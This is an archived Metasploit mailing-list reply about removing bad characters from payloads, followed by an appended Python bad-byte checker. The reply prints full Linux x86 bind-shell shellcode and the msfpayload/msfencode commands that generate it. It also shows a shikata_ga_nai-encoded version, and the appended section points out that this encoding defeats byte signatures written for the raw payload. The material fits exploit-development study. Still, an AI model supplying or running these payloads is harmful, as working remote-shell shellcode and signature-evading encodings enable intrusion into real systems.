Metasploit mailing list archives

Building multistage payloaded exploits?


From: hdm at metasploit.com (H D Moore)
Date: Mon, 24 Sep 2007 18:10:10 -0500

You are probably doing something wrong ;-) The msfpayload command only 
generates the raw shellcode; if you want to encode it, you need to 
generate it in "raw" mode, then pass it into msfencode, which takes 
the -b parameter defining the bad character set. For example:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C
/*
 * linux/x86/shell_bind_tcp - 78 bytes
 * http://www.metasploit.com
 * AppendExit=false, PrependSetresuid=false,
 * PrependSetuid=false, LPORT=4444, PrependSetreuid=false
 */
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";

# now, let's remove the 0xcd and 0x80

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \
msfencode -a x86 -b '\xcd\x80' -t c

[*] x86/shikata_ga_nai succeeded, final size 106

unsigned char buf[] =
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"
"\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"
"\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"
"\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"
"\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"
"\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"
"\x41";


-HD

On Monday 24 September 2007 18:02, scotty to hotty wrote:
Thanks hdm for clarifying my research :P. Now, I noticed problems when I
specify bad characters in metasploit... it always spits the payload
out with the bad characters still in the exploit... when I use msf2 it
works fine but when I use msf3 it keeps everything I specify to get
removed. Any workarounds to this problem? Or am I doing something
wrong?
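As an added example, not part of the thread above and not Metasploit's own code: a small Python checker that parses the "-t c" style output shown in HD's post back into bytes and reports whether any of the bytes passed to "-b" survived. The inputs are constructed from the first quoted line of each buffer above; the raw one carries the int 0x80 syscall bytes (0xcd 0x80) that the encoded output no longer contains, which is also why a byte signature written for the raw payload does not match the encoded one.

```python
import re

# Bad characters passed to msfencode -b in the post above.
BAD_CHARS = b"\xcd\x80"

# Constructed sample: the first quoted line of the raw msfpayload C output
# shown above (ends with the first int 0x80 syscall).
RAW_SAMPLE = r'''unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80";'''

# Constructed sample: the first quoted line of the shikata_ga_nai output.
ENCODED_SAMPLE = r'''unsigned char buf[] =
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4";'''


def parse_c_buf(text: str) -> bytes:
    """Turn msfpayload/msfencode '-t c' output (a C string literal built
    from \\xNN escapes, possibly split over several quoted lines) back into
    bytes. The /* ... */ header and the declaration are ignored."""
    body = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    escapes = re.findall(r"\\x([0-9a-fA-F]{2})", body)
    return bytes(int(h, 16) for h in escapes)


def find_bad_chars(payload: bytes, bad: bytes) -> dict[int, list[int]]:
    """Map each bad byte that occurs to the offsets at which it occurs."""
    hits: dict[int, list[int]] = {}
    for offset, b in enumerate(payload):
        if b in bad:
            hits.setdefault(b, []).append(offset)
    return hits


def check(text: str, bad: bytes = BAD_CHARS) -> tuple[int, dict[int, list[int]]]:
    """Return (payload length, bad-byte hits) for one block of -t c output."""
    payload = parse_c_buf(text)
    return len(payload), find_bad_chars(payload, bad)


if __name__ == "__main__":
    for label, sample in (("raw", RAW_SAMPLE), ("encoded", ENCODED_SAMPLE)):
        size, hits = check(sample)
        status = "clean" if not hits else ", ".join(
            f"0x{b:02x} at {offs}" for b, offs in hits.items())
        print(f"{label}: {size} bytes, {status}")
```

The same check run over the full 78- and 106-byte buffers from the post confirms the size msfencode reports and that no 0xcd or 0x80 byte remains after encoding.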
